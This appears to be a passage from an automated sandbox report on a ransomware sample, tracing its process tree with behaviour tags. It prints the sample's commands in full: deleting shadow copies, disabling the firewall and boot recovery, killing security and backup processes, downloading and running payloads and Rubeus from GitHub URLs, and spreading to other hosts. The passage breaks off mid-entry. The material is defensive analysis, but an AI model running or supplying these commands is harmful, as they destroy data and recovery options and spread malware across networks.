PID 4276 wrote to memory of 1780	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	135
PID 4276 wrote to memory of 1780	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	135

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe"
1⤵
- Drops desktop.ini file(s)
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del -Path C:\Users\Admin\Downloads\inf -Recurse -Force"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del -Path 'C:\Users\Admin\Downloads\Richiesta legale' -Recurse -Force"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del -Path 'C:\Users\Admin\Downloads\Demande légale' -Recurse -Force"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'c:\windows\temp\uyt.ps1'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'c:\windows\temp\k14.txt'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "taskkill /F /IM ie.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3684
- - C:\Windows\system32\taskkill.exe
    "C:\Windows\system32\taskkill.exe" /F /IM ie.exe
    3⤵
    - Kills process with taskkill
    PID:1892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\ie.exe'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\xlw.dll'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\ps.exe'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\rbs.exe'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\mz.exe'"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "Get-ChildItem -Path 'C:\Users\Admin\Downloads' -Filter *.lnk | Remove-Item -Force"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "Get-ChildItem -Path 'C:\Users\Admin\Downloads' -Filter *.zip | Remove-Item -Force"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "Get-ChildItem -Path 'C:\Users\Admin\Downloads' -Filter *.html | Remove-Item -Force"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "vssadmin delete shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3472
- - C:\Windows\system32\vssadmin.exe
    "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "netsh advfirewall set allprofiles state off"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3180
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "bcdedit /set recoveryenabled No"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Windows\system32\bcdedit.exe
    "C:\Windows\system32\bcdedit.exe" /set recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del $env:windir\system32\Taskmgr.exe & del $env:windir\system32\resmon.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM klvssbridge64
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3772
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM vapiendpoint
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ShMonitor
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:960
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Smcinst
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2376
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SmcService
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3052
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SntpService
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM svcGenericHost
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2344
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM swi_
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2740
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM TmCCSF
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM tmlisten
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1032
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM TrueKey
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM TrueKeyScheduler
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4860
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM TrueKeyServiceHelper
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:284
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM WRSVC
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM McTaskManager
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:872
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM OracleClientCache80
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3148
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM mfefire
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4956
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wbengine
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3396
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM mfemms
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:384
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM RESvc
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM mfevtp
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3720
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sacsvr
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4300
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SAVAdminService
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:752
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SAVService
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4652
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SepMasterService
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1196
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM PDVFSService
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3532
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ESHASRV
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:392
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SDRSVC
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3052
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM FA_Scheduler
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM KAVFS
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM KAVFSGT
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5088
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM kavfsslp
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM klnagent
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3232
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM macmnsvc
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:412
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM masvc
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:280
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MBAMService
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3640
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MBEndpointAgent
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2168
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM McShield
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3168
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM audioendpointbuilder
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Antivirus
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3472
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM AVP
  2⤵
  - Kills process with taskkill
  PID:4880
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM DCAgent
  2⤵
  PID:1616
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM bedbg
  2⤵
  PID:3896
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM EhttpSrv
  2⤵
  PID:2268
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MMS
  2⤵
  PID:2512
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ekrn
  2⤵
  PID:1088
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM EPSecurityService
  2⤵
  PID:1064
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM EPUpdateService
  2⤵
  PID:1584
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ntrtscan
  2⤵
  - Kills process with taskkill
  PID:2864
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM EsgShKernel
  2⤵
  PID:1004
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM msexchangeadtopology
  2⤵
  PID:4688
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM AcrSch2Svc
  2⤵
  PID:2804
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSOLAP\$TPSAMA
  2⤵
  PID:1480
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "Intel(R) PROSet Monitoring"
  2⤵
  PID:2340
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM msexchangeimap4
  2⤵
  PID:4860
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ARSM
  2⤵
  - Kills process with taskkill
  PID:292
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM unistoresvc_1af40a
  2⤵
  - Kills process with taskkill
  PID:3716
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ReportServer\$TPS
  2⤵
  - Kills process with taskkill
  PID:840
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSOLAP\$SYSTEM_BGC
  2⤵
  PID:2036
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM W3Svc
  2⤵
  - Kills process with taskkill
  PID:1140
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeSRS
  2⤵
  - Kills process with taskkill
  PID:276
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ReportServer\$TPSAMA
  2⤵
  - Kills process with taskkill
  PID:1716
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "Zoolz 2 Service"
  2⤵
  PID:1288
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSOLAP\$TPS
  2⤵
  - Kills process with taskkill
  PID:3432
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM aphidmonitorservice
  2⤵
  - Kills process with taskkill
  PID:752
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SstpSvc
  2⤵
  PID:2216
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeMTA
  2⤵
  - Kills process with taskkill
  PID:4768
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ReportServer\$SYSTEM_BGC
  2⤵
  PID:2384
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "Symantec System Recovery"
  2⤵
  PID:1416
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM UI0Detect
  2⤵
  PID:2864
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeSA
  2⤵
  - Kills process with taskkill
  PID:2076
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeIS
  2⤵
  PID:876
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ReportServer
  2⤵
  - Kills process with taskkill
  PID:1860
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MsDtsServer110
  2⤵
  PID:1484
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM POP3Svc
  2⤵
  PID:3628
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeMGMT
  2⤵
  PID:3180
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SMTPSvc
  2⤵
  PID:296
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MsDtsServer
  2⤵
  PID:1048
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM IisAdmin
  2⤵
  - Kills process with taskkill
  PID:4024
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeES
  2⤵
  PID:3000
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM EraserSvc11710
  2⤵
  - Kills process with taskkill
  PID:3148
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "Enterprise Client Service"
  2⤵
  PID:4844
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MsDtsServer100
  2⤵
  PID:2280
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM NetMsmqActivator
  2⤵
  PID:384
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM stc_raw_agent
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM VSNAPVSS
  2⤵
  - Kills process with taskkill
  PID:4404
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM PDVFSService
  2⤵
  - Kills process with taskkill
  PID:1196
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM AcrSch2Svc
  2⤵
  - Kills process with taskkill
  PID:3532
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Acronis
  2⤵
  PID:1088
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM CASAD2DWebSvc
  2⤵
  PID:680
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM CAARCUpdateSvc
  2⤵
  - Kills process with taskkill
  PID:2708
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM McAfee
  2⤵
  PID:4112
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM avpsus
  2⤵
  PID:1644
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM DLPAgentService
  2⤵
  PID:3224
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM mfewc
  2⤵
  PID:4520
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "BMR Boot Service"
  2⤵
  - Kills process with taskkill
  PID:516
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM DefWatch
  2⤵
  PID:2084
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ccEvtMgr
  2⤵
  - Kills process with taskkill
  PID:2340
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ccSetMgr
  2⤵
  - Kills process with taskkill
  PID:3484
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SavRoam
  2⤵
  - Kills process with taskkill
  PID:1216
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM RTVscan
  2⤵
  - Kills process with taskkill
  PID:3168
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM QBFCService
  2⤵
  PID:1792
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM QBIDPService
  2⤵
  PID:3000
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Intuit.QuickBooks.FCS
  2⤵
  PID:3472
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM QBCFMonitorService
  2⤵
  - Kills process with taskkill
  PID:3396
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM YooIT
  2⤵
  - Kills process with taskkill
  PID:2228
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM zhudongfangyu
  2⤵
  PID:984
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM nsService
  2⤵
  - Kills process with taskkill
  PID:1068
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM veeam
  2⤵
  PID:4536
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM backup
  2⤵
  PID:752
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sql
  2⤵
  PID:2428
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM memtas
  2⤵
  - Kills process with taskkill
  PID:4768
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM vss
  2⤵
  PID:4420
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sophos
  2⤵
  - Kills process with taskkill
  PID:1192
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM svc\$
  2⤵
  PID:940
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM mepocs
  2⤵
  PID:4356
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wuauserv
  2⤵
  PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "Get-NetNeighbor | Select-Object IPAddress"
  2⤵
  PID:3008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "net view" \\127.0.0.1
  2⤵
  PID:1048
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" view \\127.0.0.1
    3⤵
    - Discovers systems in the same network
    PID:3892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "net view" \\10.127.255.255
  2⤵
  PID:3300
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" view \\10.127.255.255
    3⤵
    - Discovers systems in the same network
    PID:1028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "net view" \\10.127.0.1
  2⤵
  PID:752
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" view \\10.127.0.1
    3⤵
    - Discovers systems in the same network
    PID:3496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "(new-object Net.WebClient).DownloadFile('https://github.com/anebgqa/d/releases/download/d/mz.exe', 'c:\Windows\temp\mz.exe'); c:\Windows\temp\mz.exe | Out-File -FilePath 'C:\\windows\\temp\\k14.txt' -Encoding utf8; exit"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  PID:1216
- - C:\Windows\temp\mz.exe
    "C:\Windows\temp\mz.exe"
    3⤵
    - Executes dropped EXE
    PID:4768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "reg query \"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\n00b\""
  2⤵
  PID:3104
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\n00b"
    3⤵
    PID:324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "(new-object Net.WebClient).DownloadFile('https://github.com/anebgqa/c/releases/download/c/ps.exe', 'C:\windows\temp\ps.exe')"
  2⤵
  - Blocklisted process makes network request
  PID:1332
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sql.exe
  2⤵
  PID:3748
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM oracle.exe
  2⤵
  PID:296
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM excel.exe
  2⤵
  PID:4592
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM infopath.exe
  2⤵
  PID:4508
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM msaccess.exe
  2⤵
  - Kills process with taskkill
  PID:3656
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM onenote.exe
  2⤵
  PID:2388
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM outlook.exe
  2⤵
  - Kills process with taskkill
  PID:3472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "(new-object Net.WebClient).DownloadFile('https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe', 'C:\windows\temp\rbs.exe')"
  2⤵
  - Blocklisted process makes network request
  PID:1480
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM powerpnt.exe
  2⤵
  - Kills process with taskkill
  PID:1584
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM thunderbird.exe
  2⤵
  PID:2280
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM tbirdconfig.exe
  2⤵
  PID:1416
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM visio.exe
  2⤵
  PID:4956
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM winword.exe
  2⤵
  - Kills process with taskkill
  PID:3892
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wordpad.exe
  2⤵
  PID:1616
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM notepad.exe
  2⤵
  - Kills process with taskkill
  PID:4904
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sql.exe
  2⤵
  PID:784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "C:\windows\temp\ps.exe -accepteula \\10.127.255.255 powershell -c \"(new-object Net.WebClient).DownloadFile('https://github.com/anebgqa/a/releases/download/a/xlw.dll', 'C:\windows\temp\xlw.dll'); C:\Windows\System32\rundll32.exe C:\windows\temp\xlw.dll,rekt;\""
  2⤵
  PID:1708
- - C:\windows\temp\ps.exe
    "C:\windows\temp\ps.exe" -accepteula \\10.127.255.255 powershell -c "(new-object Net.WebClient).DownloadFile('https://github.com/anebgqa/a/releases/download/a/xlw.dll', 'C:\windows\temp\xlw.dll'); C:\Windows\System32\rundll32.exe C:\windows\temp\xlw.dll,rekt;"
    3⤵
    - Executes dropped EXE
    PID:756
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM oracle.exe
  2⤵
  - Kills process with taskkill
  PID:3056
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM excel.exe
  2⤵
  - Kills process with taskkill
  PID:4848
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM infopath.exe
  2⤵
  - Kills process with taskkill
  PID:3500
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM msaccess.exe
  2⤵
  - Kills process with taskkill
  PID:972
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM onenote.exe
  2⤵
  PID:1352
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM outlook.exe
  2⤵
  - Kills process with taskkill
  PID:4776
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM powerpnt.exe
  2⤵
  PID:1568
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM thunderbird.exe
  2⤵
  - Kills process with taskkill
  PID:4476
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM tbirdconfig.exe
  2⤵
  PID:3632
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM visio.exe
  2⤵
  PID:2540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "C:\windows\temp\ps.exe -accepteula \\10.127.0.1 powershell -c \"(new-object Net.WebClient).DownloadFile('https://github.com/anebgqa/a/releases/download/a/xlw.dll', 'C:\windows\temp\xlw.dll'); C:\Windows\System32\rundll32.exe C:\windows\temp\xlw.dll,rekt;\""
  2⤵
  PID:3472
- - C:\windows\temp\ps.exe
    "C:\windows\temp\ps.exe" -accepteula \\10.127.0.1 powershell -c "(new-object Net.WebClient).DownloadFile('https://github.com/anebgqa/a/releases/download/a/xlw.dll', 'C:\windows\temp\xlw.dll'); C:\Windows\System32\rundll32.exe C:\windows\temp\xlw.dll,rekt;"
    3⤵
    - Executes dropped EXE
    PID:1192
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM winword.exe
  2⤵
  PID:1088
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wordpad.exe
  2⤵
  PID:4956
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM notepad.exe
  2⤵
  - Kills process with taskkill
  PID:2260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "reg add \"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\n00b\" /f /v matb /t Reg_DWORD /d 1"
  2⤵
  PID:512
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\n00b" /f /v matb /t Reg_DWORD /d 1
    3⤵
    PID:1664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del -Path C:\Users\Admin\Downloads\inf -Recurse -Force"
  2⤵
  PID:1660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del -Path 'C:\Users\Admin\Downloads\Richiesta legale' -Recurse -Force"
  2⤵
  PID:5016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del -Path 'C:\Users\Admin\Downloads\Demande légale' -Recurse -Force"
  2⤵
  PID:1984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'c:\windows\temp\uyt.ps1'"
  2⤵
  PID:2992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'c:\windows\temp\k14.txt'"
  2⤵
  PID:2100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "taskkill /F /IM ie.exe"
  2⤵
  PID:3680
- - C:\Windows\system32\taskkill.exe
    "C:\Windows\system32\taskkill.exe" /F /IM ie.exe
    3⤵
    PID:1780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\ie.exe'"
  2⤵
  PID:2596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\xlw.dll'"
  2⤵
  PID:5088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\ps.exe'"
  2⤵
  PID:3248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
